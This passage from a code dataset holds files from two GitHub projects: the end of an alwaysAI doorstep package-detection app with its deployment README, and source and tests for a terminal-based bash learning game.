\"webcam\"\n package_detector.load(engine=edgeiq.Engine.DNN)\n else:\n cam_type = \"ncs2\"\n package_detector.load(engine=edgeiq.Engine.DNN_OPENVINO)\n else:\n cam_type = \"openncc\"\n model_name = \"abhatikar/package_detector_ncc\"\n\n # add a centroid tracker to see if a new package arrives\n centroid_tracker = edgeiq.CentroidTracker(\n deregister_frames=10, max_distance=50)\n if cam_type is not \"openncc\":\n # Descriptions printed to console\n print(\"Engine: {}\".format(package_detector.engine))\n print(\"Accelerator: {}\\n\".format(package_detector.accelerator))\n print(\"Model:\\n{}\\n\".format(package_detector.model_id))\n print(\"Labels:\\n{}\\n\".format(package_detector.labels))\n\n fps = edgeiq.FPS()\n\n # Variables to limit inference\n counter = 0\n DETECT_RATE = 10\n\n # Object to monitor the system\n pm = PackageMonitor()\n\n if cam_type is \"openncc\":\n video_stream = edgeiq.EyeCloud(model_name).start()\n else:\n video_stream = edgeiq.WebcamVideoStream(cam=0).start()\n try:\n with edgeiq.Streamer() as streamer:\n\n # Allow the camera to warm up\n time.sleep(2.0)\n fps.start()\n\n # Loop detection\n while True:\n counter += 1\n\n # Run this loop whenever there's a package detected or every DETECT_RATE frames\n if pm.package_is_detected() or counter % DETECT_RATE == 0:\n\n # Read in the video stream\n if cam_type is \"openncc\":\n frame = video_stream.get_frame()\n # Check for packages in the new frame\n package_results = video_stream.get_model_result(confidence_level=.90)\n else:\n frame = video_stream.read()\n # Check for packages in the new frame\n package_results = package_detector.detect_objects(\n frame, confidence_level=.90)\n\n if package_results is not None:\n # update the package predictions\n objects = centroid_tracker.update(package_results.predictions)\n pm.set_packages(objects)\n\n # Generate labels to display the face detections on the streamer\n text = [\"Model: {}\".format(model_name)]\n text.append(\n \"Inference time: {:1.3f} s\".format(package_results.duration))\n predictions = []\n\n # update labels for each identified package to print to the screen\n for (object_id, prediction) in objects.items():\n new_label = 'Package {}'.format(object_id)\n prediction.label = new_label\n text.append(new_label)\n predictions.append(prediction)\n\n # Alter the original frame mark up to show tracking labels\n frame = edgeiq.markup_image(\n frame, predictions,\n show_labels=True, show_confidences=False,\n line_thickness=3, font_size=1, font_thickness=3)\n\n # Do some action based on state\n text.append(pm.action())\n\n # Send the image frame and the predictions to the output stream\n streamer.send_data(frame, text)\n\n fps.update()\n\n if streamer.check_exit():\n video_stream.stop()\n break\n\n finally:\n fps.stop()\n print(\"elapsed time: {:.2f}\".format(fps.get_elapsed_seconds()))\n print(\"approx. FPS: {:.2f}\".format(fps.compute_fps()))\n print(\"Program Ending\")\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.7037312388420105, "alphanum_fraction": 0.7477329969406128, "avg_line_length": 46.37323760986328, "blob_id": "95e9c06361f2fa8825cfaf7a4cf9a921445c9f38", "content_id": "7bfaca933f199e6b31786d623e495853c166fea8", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 13454, "license_type": "permissive", "max_line_length": 850, "num_lines": 284, "path": "/package_detection/README.md", "repo_name": "abhatikar/package-monitor", "src_encoding": "UTF-8", "text": "# Package Monitor and Detection App\nThis app is designed to let you use your own custom package detection model to detect when packages arrive and when they are removed You'll need an alwaysAI account and to have alwayAI installed:\n\n- [alwaysAI account](https://alwaysai.co/auth?register=true)\n- [alwaysAI CLI tools](https://dashboard.alwaysai.co/docs/getting_started/development_computer_setup.html)\n\n## Requirements\nThis app is intended to work on a model you've trained yourself! Follow the steps below before running your app. The alwaysAI support team is available on Discord to help you if you get stuck: https://discord.gg/rjDdRPT.\n\n### Collect a Dataset\nTo get you up and running, we've prepared a [dataset](https://www.alwaysai.co/docs/_static/beta/Packages.zip) that includes a few hundred images of packages being placed and removed from an outdoor doorstep. This app will work best using a model that has been trained on your own doorstep (or wherever you intend to run your app), so we encourage you to add to this dataset. See [this doc](https://alwaysai.co/docs/model_training/data_collection.html#data-capture-guidelines) for data collection tips). For speedy data collection, you can use this [image capture app](https://github.com/alwaysai/expanded-image-capture-dashboard) available on the alwaysAI GitHub. Also checkout the [hacky hour](https://www.youtube.com/watch?v=jNpxVea8F9Q&feature=youtu.be) on the package dataset collection for tips on how to set up your own data collection process.\n\n### Annotate your Data\nThen you can annotate your data, using [this guide](https://alwaysai.co/docs/model_training/data_annotation.html).\n\n### Dataset\n\nThe images catpured and annotated look like these. These are the pictures of the package at the doorstep at varied angles and lighting conditions.\n\n<img src=\"https://github.com/abhatikar/package-monitor/raw/main/assets/data1.png\" width=\"600\" height=\"600\">\n\n<img src=\"https://github.com/abhatikar/package-monitor/raw/main/assets/data2.png\" width=\"600\" height=\"600\">\n\n\n### Train your Model\n Then, follow the [training section](https://alwaysai.co/docs/model_training/quickstart.html#step-3-train-your-model) of our quickstart guide to train your own model. You'll find links to tips for data collection and annotation on that page as well. To see how to use your model in an application, refer to the [Model Publish](#model-publish) section.\n\n### Set up your Project\nClone this repo into a local directory. Then cd into new folder and run `aai app configure` and make the following selections:\n- When prompted to choose a project, use the down arrow and select `Create new project`, choosing any name you like.\n- Choose to run either locally or on an edge device.\n\nThe `app.py` and `alwaysai.app.json` files should be automatically detected and you should not need to create them.\n\nYou can find details on working with projects [here](https://alwaysai.co/docs/getting_started/working_with_projects.html).\n\n\n## Model Conversion\n\n![alt text](https://github.com/abhatikar/package-monitor/raw/main/assets/convert.png \"Model Conversion\")\n\nIf you want to run this app using an OpenNCC camera, you will have to convert the model you have trained into the format that makes it optimized to run on the OpenNCC camera. The conversion uses the OpenVino toolkit to achieve this. That way you could use the camera with a embedded microcomputer like raspberry pi without compromising the speed of the model inferences. To convert your model to the EyeCloud optimized format, run:\n\n```bash\naai model convert <input-model-id> --format eyecloud --output_id <output-model-id>\n```\n\nHere the `input model id` is the full id, including your usename; this is what is output at the end of a training session and has a format of `<username/model-name>`. The `output model id` is just the name you want to give the converted model, do not include your username in this.\ne.g if `abhatikar/package_detector` is the model name that is trained locally, and the output model id is `package_detector_eyecloud`, so the command to convert the model to eyecloud camera format would be:\n\n```bash\naai model convert abhatikar/package_detector --format eyecloud --output_id package_detector_eyecloud\n```\n\nYou can then publish the converted model into the alwaysai platform to use them in your projects.\n\n## Publish Your Model\nYou can either publish your model and add it to your project using aai app models add, or test out an unpublished version using the --local-version flag with this command. See [this documentation](https://alwaysai.co/docs/model_training/using_your_model.html) for full details.\n\nRefer to the AlwaysAI docs to know how you can achieve this using the CLI.\n\n## Running\nYou can run the application in 6 different ways.\n\n#### <b>Use a laptop with the USB webcam</b>\n\nConnect your Web camera to your laptop's USB port. Replace the models in `app.py` with the name of your own model or leave it as default!\nNext, you copy the Dockerfile template for alwaysai.\n\nRun the project as you would any alwaysAI app! See [our docs pages](https://alwaysai.co/blog/building-and-deploying-apps-on-alwaysai) if you need help running your program.\n\n```bash\ncp Dockerfile.alwaysai Dockerfile\ncp alwaysai.app.json.usbcam alwaysai.app.json\naai app configure\naai app install\naai app start\n```\nThis will run the app without any acceleration and you will see the inference time is higher\n\n#### <b>Use a laptop with the USB webcam and NCS2 stick</b>\n\nConnect your webcam camera to your laptop's USB port.Connect the NCS2 stick to the laptop's USB 3.0 port. Replace the models in `app.py` with the name of your own model or leave it as default! \nNext, you copy the Dockerfile template for alwaysai.\n\nRun the project as you would any alwaysAI app! See [our docs pages](https://alwaysai.co/blog/building-and-deploying-apps-on-alwaysai) if you need help running your program.\n\n```bash\nexport NCS2_CAM=1\ncp Dockerfile.alwaysai Dockerfile\ncp alwaysai.app.json.usbcam alwaysai.app.json\naai app configure\naai app install\naai app start\n```\n\n#### <b>Use a laptop with the OpenNCC camera</b>\n\nConnect your OpenNCC camera to your laptop's USB 3.0 port. Replace the models in `app.py` with the name of your own model which you converted \nor leave it as default! \nNext, you copy the Dockerfile template for alwaysai.\n\nRun the project as you would any alwaysAI app! See [our docs pages](https://alwaysai.co/blog/building-and-deploying-apps-on-alwaysai) if you need help running your program.\n\n```bash\nexport OpenNCC=1\ncp Dockerfile.alwaysai Dockerfile\ncp alwaysai.app.json.eyecloud alwaysai.app.json\naai app configure\naai app install\naai app start\n```\n\n#### <b>Use a Raspberry Pi4 with the USB webcam</b>\n<p>\n\nConnect your webcam to the Raspberry Pi4 USB 3.0 port. Replace the models in `app.py` with the name of your own model or leave it as default! \nFollow the [guide](https://www.balena.io/docs/learn/getting-started/raspberrypi4-64/python/) to setup the Raspberry Pi4 to work with Balena platform.\nNext, you copy the Dockerfile template for Balena and run the balena cli commands as shown below from the top level directory\n\n```bash\ncp Dockerfile.balena Dockerfile\ncp alwaysai.app.json.usbcam alwaysai.app.json\ncd <directory which has docker-compose.yml>\nbalena push <app name>\n```\n\n#### <b>Use a Raspberry Pi4 with the USB webcam and NCS2 stick</b>\n<p>\n\n<u><b>*Architecture*</b></u>\n\n![alt text](https://github.com/abhatikar/package-monitor/raw/main/assets/arch2.png \"Architecture\")\n\n\n<u><b>*Setup*</b></u>\n\n<img src=\"https://github.com/abhatikar/package-monitor/raw/main/assets/setup2.jpg\" width=\"600\" height=\"600\">\n\nConnect your webcam and the NCS2 stick to the Raspberry Pi4 USB 3.0 port. Replace the model in `app.py` with the name of your own model or leave it as default! \nFollow the [guide](https://www.balena.io/docs/learn/getting-started/raspberrypi4-64/python/) to setup the Raspberry Pi4 to work with Balena platform.\nNext, you copy the Dockerfile template for Balena and run the balena cli commands as shown below from the top level directory\nUncomment the line to enable the NCS2 with USB webcam in the `docker-compose.yaml`\n\n`#- NCS2_CAM=1 #Enable this if you have NCS stick plugged in`\n\n```bash\ncp Dockerfile.balena Dockerfile\ncp alwaysai.app.json.usbcam alwaysai.app.json\ncd <directory which has docker-compose.yml>\nbalena push <app name>\n```\n#### Example Output\n\n```bash\n\n[Logs] [1/12/2021, 11:16:32 PM] [package-monitor] Engine: Engine.DNN_OPENVINO\n[Logs] [1/12/2021, 11:16:32 PM] [package-monitor] Accelerator: Accelerator.MYRIAD\n[Logs] [1/12/2021, 11:16:32 PM] [package-monitor]\n[Logs] [1/12/2021, 11:16:32 PM] [package-monitor] Model:\n[Logs] [1/12/2021, 11:16:32 PM] [package-monitor] abhatikar/package_detector\n[Logs] [1/12/2021, 11:16:32 PM] [package-monitor]\n[Logs] [1/12/2021, 11:16:32 PM] [package-monitor] Labels:\n[Logs] [1/12/2021, 11:16:32 PM] [package-monitor] ['???', 'package']\n[Logs] [1/12/2021, 11:16:32 PM] [package-monitor]\n[Logs] [1/12/2021, 11:16:32 PM] [package-monitor] [INFO] Streamer started at http://localhost:5000\n\n```\n\n\n#### <b>Use a Raspberry Pi4 with the OpenNCC camera</b>\n<p>\n\n<u><b>*Architecture*</b></u>\n\n![alt text](https://github.com/abhatikar/package-monitor/raw/main/assets/arch.png \"Architecture\")\n\n\n<u><b>*Setup*</b></u>\n\n<img src=\"https://github.com/abhatikar/package-monitor/raw/main/assets/setup.jpg\" width=\"600\" height=\"600\">\n\nConnect your OpenNCC camera to the Raspberry Pi4 USB 3.0 port. Replace the models in `app.py` with the name of your own model which you converted! \nFollow the [guide](https://www.balena.io/docs/learn/getting-started/raspberrypi4-64/python/) to setup the Raspberry Pi4 to work with Balena platform.\nNext, you copy the Dockerfile template for Balena and run the balena cli commands as shown below from the top level directory\nUncomment the line to enable the NCS2 with USB webcam in the `docker-compose.yaml`\n\n`# - OPENNCC_CAM=1 #Enable this if you have an EyeCloud camera`\n\n```bash\ncp Dockerfile.balena Dockerfile\ncp alwaysai.app.json.eyecloud alwaysai.app.json\ncd <directory which has docker-compose.yml>\nbalena push <app name>\n```\n\nHere is the [link](https://www.youtube.com/watch?v=fk3arnsZ45Q) to the demo video.\n\nNote: If you use the OpenNCC IPC camera, it has Raspberry Pi 4 built-in which makes it an edge device in itself and you would not require a external micro computer.\n\n#### Mobile App\n\nTo get the notification on your mobile phone, download this [app](https://play.google.com/store/apps/details?id=com.app.vetru.mqttdashboard&hl=en_IE&gl=US) on your Android Phone.\n\nConfigure the broker to point to the MQTT broker of your choice. I am using a public broker which should be only used for <b>testing purposes</b> only.\n\nCreate a Text widget to subscribe to the topic matching in the file package_monitor.py. In our code we are using the MQTT topic <b><i>alwaysai/package-alert</b></i>. I strongly recommend to use a private broker and unique MQTT topic if you are using a public broker for testing.\n\n#### Example Output\n\n```bash\n/open_ncc_lib/moviUsbBoot /open_ncc_lib/flicRefApp.mvcmd\nPerforming bulk write of 8168336 bytes from /open_ncc_lib/flicRefApp.mvcmd...\nSuccessfully sent 8168336 bytes of data in 322.738822 ms (24.136954 MB/s)\ndevice opened\n03E7:F63B (usbver:32, bus 2, device 2)get our self usb device ver:32\n path: 6\noutEndPoint:[1]\ninEndPoint:[81]\noutEndPoint:[2]\ninEndPoint:[82]\noutEndPoint:[3]\ninEndPoint:[83]\n\n1D6B:0003 (usbver:30, bus 2, device 1)\n1532:0224 (usbver:20, bus 1, device 4) path: 8\n\n0BDA:579F (usbver:20, bus 1, device 3) path: 7\ninEndPoint:[81]\n\n0CF3:E300 (usbver:20, bus 1, device 2) path: 4\ninEndPoint:[82]\noutEndPoint:[2]\n\n1D6B:0002 (usbver:20, bus 1, device 1)\n22:18:43 : sdk/sdk.cpp(534) enter watchdog task.....\ncamera_video_out YUV420p 2\n22:18:43 : sdk/sdk.cpp(1230) meanValue: 0.00 0.00 0.00\n22:18:43 : sdk/sdk.cpp(889) initstatus ret:0 \n--------------------------------------------\nCamera detection succeeded!(sc8238)\n\n\n22:18:43 : sdk/sdk.cpp(900) CAM_AI_MODE\n22:18:43 : sdk/sdk.cpp(507) Reading Blob file: /app/models/abhatikar/package_detector_ncc/package_detector_ncc.blob (sz 13937728)\n\n22:18:43 : sdk/sdk.cpp(524) Blob size 13937728 has been sent return 0 meta size=1408\n\n22:18:43 : sdk/sdk.cpp(970) send blob ret =0 \n********Setup Caminfo size =68**********\nsize :1920 X 1080 \nai area:(0,0,1920,1080)\nai input: 300 X 300 \nmeanValue:0.00-0.00-0.00 stdValue:0\nEnable Output: YUV=1 H26x=0 MJpeg=0 Encoder type:0\n********Setup Caminfo**********\nsend CameraInfo ret=0 \n22:18:43 : sdk/sdk.cpp(991) create queue yuv:0xd48c55c0 26x:0xd4c0a3e0 jpg:0xd4924d70 cnn:0xd4924e00 \ninitstatus \n--------------------------------------------\nCamera detection succeeded!(sc8238)\nDevice initialized OK!\n--------------------------------------------\n \ncreate thread ep 0 success!\ncreate thread ep 1 success!\n22:18:43 : sdk/sdk.cpp(258) enter scReadThread ep 0 ******\n\ncreate thread ep 2 success!\n22:18:43 : sdk/sdk.cpp(258) enter scReadThread ep 1 ******\n\n22:18:43 : sdk/sdk.cpp(258) enter scReadThread ep 2 ******\n\n[INFO] Streamer started at http://localhost:5000\n22:18:43 : sdk/sdk.cpp(338) EP:0 Meta type:2,seqNo:10, len:3110400 usb_size=3110464\n\n22:18:43 : sdk/sdk.cpp(338) EP:1 Meta type:24,seqNo:10, len:1472 usb_size=1536\n\n```\n\n## Troubleshooting\nDocs: https://dashboard.alwaysai.co/docs/getting_started/introduction.html\n\nCommunity Discord: https://discord.gg/rjDdRPT\n" } ]
3
bogobogo/bash-game
https://github.com/bogobogo/bash-game
91607ee9a7a3bd315c3e45aeb56b380e09c3a429
0eb278ed2fe657285bb5c8fc54b3c5478947c8d3
af8188252078e04c9ddf824bf21998f6cee48d43
refs/heads/master
2020-03-19T00:24:59.310244
2018-06-06T22:18:23
2018-06-06T22:18:23
135,479,177
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.500189483165741, "alphanum_fraction": 0.5365668535232544, "avg_line_length": 34.186668395996094, "blob_id": "29c3cb2ba993aa420323d55912629cd07fdeb744", "content_id": "be0cff716722a8b0a283510404f2003a4118e021", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2639, "license_type": "no_license", "max_line_length": 364, "num_lines": 75, "path": "/tests/main_test.py", "repo_name": "bogobogo/bash-game", "src_encoding": "UTF-8", "text": "import unittest\nimport sys\nimport os\nsys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))\nfrom src.main import addOutput, fill_line, addUserInput, prompt, InvalidArgument \n\n\nclass Tests(unittest.TestCase):\n ls_output = 'ideas.py\\nmain.py\\ntest.py\\nutils.py\\n'\n ps_putput = ' PID TTY TIME CMD\\n 1366 ttys000 0:00.21 /bin/zsh -l\\n 1743 ttys000 0:00.03 python\\n 534 ttys001 0:00.02 python\\n81324 ttys001 0:00.03 /Applications/iTerm.app/Contents/MacOS/iTerm2 --server login -fp eladbo\\n81326 ttys001 0:00.54 -zsh\\n 1756 ttys002 0:00.44 -zsh\\n 4082 ttys002 0:00.03 /usr/bin/python ./main.py\\n'\n def test_fill_line(self):\n l = 'asdf'\n c = '.'\n in_width = 80\n expected = 'asdf' + ('.' * (in_width-len(l)))\n result = fill_line(l, c, in_width=in_width)\n self.assertEqual(expected, result)\n\n def test_fill_line_invalid_char(self):\n l = 'asdf'\n c = '..'\n in_width = 80\n expected = 'asdf' + ('.' * (in_width-len(l)))\n self.assertRaises(\n InvalidArgument,\n lambda: fill_line(l, c, in_width=in_width)\n )\n\n def test_addOutput_1_line(self):\n output = 'ideas.py\\n'\n totalout_lines = []\n result = [\n fill_line('ideas.py','.'),\n ]\n addOutput(output, totalout_lines)\n self.assertEqual(totalout_lines, result)\n\n def test_addOutput_ls(self):\n totalout_lines = []\n result = [\n fill_line('ideas.py','.'),\n fill_line('main.py','.'),\n fill_line('test.py','.'),\n fill_line('utils.py','.'),\n ]\n addOutput(self.ls_output, totalout_lines, in_width=80)\n self.assertEqual(totalout_lines, result)\n\n def test_addOutput_over_IN_WIDTH(self):\n totalout_lines = []\n result = [\n fill_line('ideas.py','.'),\n fill_line('main.py','.'),\n fill_line('test.py','.'),\n fill_line('utils.py','.'),\n ]\n addOutput(self.ls_output, totalout_lines)\n self.assertEqual(totalout_lines, result)\n def test_add_user_input_fill(self):\n cmd = \"top -a\"\n totalout_lines = [\n prompt + \"ls\",\n fill_line('main.py',c = '.'),\n prompt\n ]\n addUserInput(cmd, totalout_lines)\n expected = [\n prompt + \"ls\",\n fill_line('main.py',c = '.'),\n fill_line(prompt + cmd, c = '.', compensation=10)\n ]\n self.assertEqual(totalout_lines, expected)\n \nif __name__ == '__main__':\n unittest.main()\n" }, { "alpha_fraction": 0.5308641791343689, "alphanum_fraction": 0.5432098507881165, "avg_line_length": 19.5, "blob_id": "3f57f4f4cb96d4596d83e74fccb150dad8e38b5c", "content_id": "2bb87612c070428b218107c8acc02e5f8c86d2ec", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 81, "license_type": "no_license", "max_line_length": 24, "num_lines": 4, "path": "/src/utils.py", "repo_name": "bogobogo/bash-game", "src_encoding": "UTF-8", "text": "def removeNewLine(s):\n if s.endswith(\"\\n\"):\n return s[:-1]\n return s" }, { "alpha_fraction": 0.5871211886405945, "alphanum_fraction": 0.6553030014038086, "avg_line_length": 21, "blob_id": "26e909aaa809fb57330a490de699b5c8958b8e14", "content_id": "0ee070c17f71779f3ce0d695464ed8b2a7363170", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 264, "license_type": "no_license", "max_line_length": 76, "num_lines": 12, "path": "/src/game.py", "repo_name": "bogobogo/bash-game", "src_encoding": "UTF-8", "text": "\nlevels = {\"1\" : 100, \n \"2\": 400, \n \"3\": 1000}\n\ndef createMission(desiredOutput, desiredInput, messages, xp, errorMessages):\n pass\n\nmission1 = createMission()\nmission2 = createMission()\nmissions = [mission1, mission2, mission3]\n\ngame(missions)" }, { "alpha_fraction": 0.5992907881736755, "alphanum_fraction": 0.616233229637146, "avg_line_length": 31.139240264892578, "blob_id": "ee4a2c7d7948a735bd8714f55d40a4106ef0e852", "content_id": "b8206108a544ffde84e15ec9f7ef2919bec86855", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2538, "license_type": "no_license", "max_line_length": 87, "num_lines": 79, "path": "/src/main.py", "repo_name": "bogobogo/bash-game", "src_encoding": "UTF-8", "text": "#!/usr/bin/python \n# -*- coding: utf-8 -*-\nimport sys\nimport subprocess\nimport os\nimport fileinput\nimport time\nimport renderer\nfrom consts import IN_WIDTH, TESTING\nfrom utils import removeNewLine\nfrom messages import level1_firstMessage, progressBar, totalxp\nfrom strings import first_message\n\ngetUserInput = lambda: sys.stdin.readline()\nclass InvalidArgument(Exception):\n pass\n \nprompt = '\\033[95m' + \"level 1 Hi game >\" + '\\033[94m'\n\ndef addPrompt(totalout_lines, prompt): \n totalout_lines.append('\\033[95m' + \"level 1 Hi game >\" + '\\033[94m')\n\ndef addUserInput(cmd, totalout_lines):\n totalout_lines[-1] = fill_line(totalout_lines[-1] + cmd , c=\" \", compensation = 10)\n\ndef fill_line(l, c=' ', in_width=IN_WIDTH, compensation = 0):\n if len(c) != 1:\n raise InvalidArgument\n return l + c * ((in_width-len(l)) + compensation)\n\ndef addOutput(output, totalout_lines, in_width=IN_WIDTH):\n lines = output.split(\"\\n\")\n filled_lines = []\n for l in lines:\n if len(l) < in_width and l != '':\n filled_lines.append(fill_line(l, c = \" \"))\n totalout_lines += filled_lines\n\n\ndef turn(totalout_lines, n=0):\n addPrompt(totalout_lines, prompt)\n renderer.write(prompt)\n userInput = getUserInput()\n command = removeNewLine(userInput)\n addUserInput(command, totalout_lines)\n try:\n process = subprocess.Popen(command, shell=True,\n stdout=subprocess.PIPE, \n stderr=subprocess.PIPE)\n out, err = process.communicate()\n subprocess.call(\"tput civis\", shell=True)\n totalxp.clean(totalout_lines) \n progressBar.clean(totalout_lines)\n level1_firstMessage.clean(totalout_lines)\n if out:\n addOutput(out, totalout_lines)\n renderer.write(out)\n elif err:\n addOutput(err, totalout_lines)\n renderer.write(err)\n totalxp.overlay(totalout_lines) \n progressBar.overlay(totalout_lines)\n level1_firstMessage.overlay(totalout_lines) \n subprocess.call(\"tput cnorm\", shell=True) \n turn(totalout_lines, n=n+1)\n except Exception as e:\n print 'Exception: %s' % e \n\nif __name__ == '__main__':\n renderer.cleanScreen()\n # subprocess.call(\"tput cup 0 1\", shell=True)\n renderer.setTerminalSize(150, 150)\n totalxp.overlay([]) \n progressBar.overlay([])\n level1_firstMessage.overlay([])\n turn([])\n\n## if command == 'cd ..':\n # os.chdir('..')" }, { "alpha_fraction": 0.599591851234436, "alphanum_fraction": 0.6236734986305237, "avg_line_length": 53.46666717529297, "blob_id": "c89a6824254129d618f6418ca090df1d18a08e5e", "content_id": "614934b70c3aea949b91f4ce09867b06fc5128a0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2450, "license_type": "no_license", "max_line_length": 146, "num_lines": 45, "path": "/tests/renderer_test.py", "repo_name": "bogobogo/bash-game", "src_encoding": "UTF-8", "text": "import unittest \nimport sys\nimport os\nsys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))\nfrom src.consts import IN_WIDTH\nfrom src.renderer import getRelevantHistoryLines, combineHistoryAndMessage\nfrom src.messages import Message\nfrom test_strings import first_message_no_tabs\n\nclass RendererTest(unittest.TestCase):\n def test_get_corrasponding_lines_with_long_line_history(self):\n line_history = [\"hello\" for _ in xrange(1, 100)]\n message_lines = first_message_no_tabs.split(\"\\n\")\n screen_height = 50\n msg_len = len(message_lines)\n start_position_from_top = 11\n result = getRelevantHistoryLines(line_history, screen_height, msg_len, start_position_from_top)\n self.assertEqual(len(result), len(message_lines) - 1)\n self.assertEqual(result, [\"hello\" for _ in xrange(0, len(message_lines) - 1)])\n\n def test_combine_message_and_history_that_covers_the_screen(self):\n line_history = [str(i) + (\" \" * (IN_WIDTH - len(str(i)))) for i in xrange(1, 100)]\n msg = Message(\"yo\\n\"*29 + \"yo\", \"first\", (50, 11)) \n screen_height = 50\n result = combineHistoryAndMessage(msg.message, 11, line_history, screen_height)\n expectedResult = \"yo\\n\" + ((\" \" * IN_WIDTH) + \"yo\\n\") * 28 + (\" \" * IN_WIDTH) + \"yo\"\n self.assertEqual(result, expectedResult)\n def test_combine_message_and_history_that_intersects(self):\n line_history = [\"hello\" + (IN_WIDTH - len(\"hello\")) * \" \" for _ in xrange(0, 15)]\n msg = Message(\"yo\\n\"*29 + \"yo\", \"first\", (50, 11)) \n screen_height = 50\n result = combineHistoryAndMessage(msg.message, 11, line_history, screen_height)\n expectedResult = \"yo\\n\" + (\"hello\" + \" \" * (IN_WIDTH - len(\"hello\")) + \"yo\\n\") * 4 + (\" \" * IN_WIDTH + \"yo\\n\") * 24 + \" \"*IN_WIDTH + \"yo\"\n self.assertEqual(result, expectedResult)\n def test_combine_message_and_history_that_doesnt_intersect(self):\n line_history = [\"hello\"+ \" \" * 3 for _ in xrange(1, 9)]\n msg = Message(\"yo\\n\"*29 + \"yo\", \"first\", (50, 11)) \n screen_height = 50\n result = combineHistoryAndMessage(msg.message, 11, line_history, screen_height)\n expectedResult = \"yo\\n\" + 28* (IN_WIDTH*\" \" + \"yo\\n\") + \" \"*IN_WIDTH + \"yo\"\n self.assertEqual(result, expectedResult) \n def test_combine_delete_message_and_history(self):\n pass\nif __name__ == '__main__':\n unittest.main()" }, { "alpha_fraction": 0.6857234239578247, "alphanum_fraction": 0.690194845199585, "avg_line_length": 39.089744567871094, "blob_id": "e109824f5b83e6c1643807fe0a96e2b871320fd6", "content_id": "d2b52e42c66e9c438fdbcdedf1186bb07f85c6d4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3131, "license_type": "no_license", "max_line_length": 164, "num_lines": 78, "path": "/src/renderer.py", "repo_name": "bogobogo/bash-game", "src_encoding": "UTF-8", "text": "import sys\nimport subprocess\nimport itertools\nfrom consts import IN_WIDTH\n\nfillIn = \" \" * IN_WIDTH\n\ndef setTerminalSize(x, y):\n sys.stdout.write(\"\\x1b[8;{rows};{cols}t\".format(rows=y, cols=x))\n\ndef getTerminalSize():\n x = subprocess.check_output(\"tput cols\", shell=True)\n y = subprocess.check_output(\"tput lines\", shell=True)\n return (int(x), int(y))\n\ndef cleanScreen():\n subprocess.call(\"clear\", shell=True)\n subprocess.call(\"printf '\\e[3J'\", shell=True)\n\ndef goto(x, y):\n \"\"\" Moves curser to a position relative to current top of screen \"\"\"\n subprocess.call(\"tput cup %d %d\" % (y, x), shell=True)\n\ndef saveCursorPosition():\n subprocess.call(\"tput sc\", shell=True)\n\ndef restoreCursorPosition():\n subprocess.call(\"tput rc\", shell=True)\ndef echoMessage(message):\n \"\"\" Used for message writing after moving the cursor \"\"\"\n subprocess.call(\"echo '\" + message + \"'\", shell=True)\n\ndef write(message):\n \"\"\" default stdout message \"\"\" \n sys.stdout.write(message)\n\ndef printMessage(message): \n \"\"\" Used for elaborate ASCII messages \"\"\"\n subprocess.call([\"printf $'\" + message + \"'\", \"-n\"] , shell=True)\n\ndef printMessageAt(message, location):\n saveCursorPosition()\n goto(location[0],location[1])\n printMessage(message) \n restoreCursorPosition()\n\ndef getRelevantHistoryLines(line_history, scrn_height, msg_len, startY):\n line_history_first_line_pos = len(line_history) - (scrn_height - startY) + 2\n line_history_last_line_pos = line_history_first_line_pos + msg_len - 1\n history_lines_to_add = line_history[line_history_first_line_pos: line_history_last_line_pos]\n return history_lines_to_add\n\ndef historyCoversScreen(line_history, scrn_height):\n return len(line_history) >= scrn_height\n\ndef historyAndMsgIntersect(line_history, startY):\n return len(line_history) > startY\n\ndef combinedMessages(msg_lines, history_lines):\n if len(msg_lines) > len(history_lines):\n return msg_lines[0] + '\\n' + '\\n'.join([line + msg_line for line, msg_line in list(itertools.izip_longest(history_lines, msg_lines[1:], fillvalue=fillIn))])\n else:\n raise ValueError('message length should always be longer than the history lines to combine')\ndef combineHistoryAndMessage(message, starting_line, line_history, scrn_height):\n if historyCoversScreen(line_history, scrn_height):\n msg_len = len(message)\n # Since pressing enter pushes everything a line up in a full screen we deduce it by 1\n starting_line = starting_line - 1\n history_lines_to_add = getRelevantHistoryLines(line_history, scrn_height, msg_len, starting_line)\n if len(history_lines_to_add) != msg_len - 1:\n raise ValueError('message length be 1 less when historyCoversScreen')\n return combinedMessages(message, history_lines_to_add)\n elif historyAndMsgIntersect(line_history, starting_line):\n msg_len = len(message)\n history_lines_to_add = line_history[starting_line + 1: starting_line + msg_len]\n return combinedMessages(message, history_lines_to_add)\n else: \n return combinedMessages(message, [])\n\n\n\n\n" }, { "alpha_fraction": 0.6428571343421936, "alphanum_fraction": 0.7142857313156128, "avg_line_length": 13.5, "blob_id": "6149a1bacd02556cfe25e99e942730490bdc09a2", "content_id": "ffffd63c2602157fe0c2aa9341bef182a8dfbaf9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 28, "license_type": "no_license", "max_line_length": 14, "num_lines": 2, "path": "/src/consts.py", "repo_name": "bogobogo/bash-game", "src_encoding": "UTF-8", "text": "IN_WIDTH = 70\nTESTING = True" }, { "alpha_fraction": 0.3465067148208618, "alphanum_fraction": 0.35038813948631287, "avg_line_length": 48.71929931640625, "blob_id": "cd2ebb95b064e54dc59364d1507403db2d528665", "content_id": "8ea2ecbf2526a04c4a2d0194a2ebab54ba8fb12f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2834, "license_type": "no_license", "max_line_length": 128, "num_lines": 57, "path": "/src/strings.py", "repo_name": "bogobogo/bash-game", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nimport subprocess\nimport os\n\n#### welcome to syshero - a multiplayer game world where you cooperate and compete with others to gain reputation and resources,\n# using unix knowledge. no prior knowledge is required. you will enter the multiplayer world when you reach level 10.\n# to get Started create your character\n# Name:\n#\n# \n#to enter the world press y \n#### use \n#\n\ntotalxp = '80xp to level 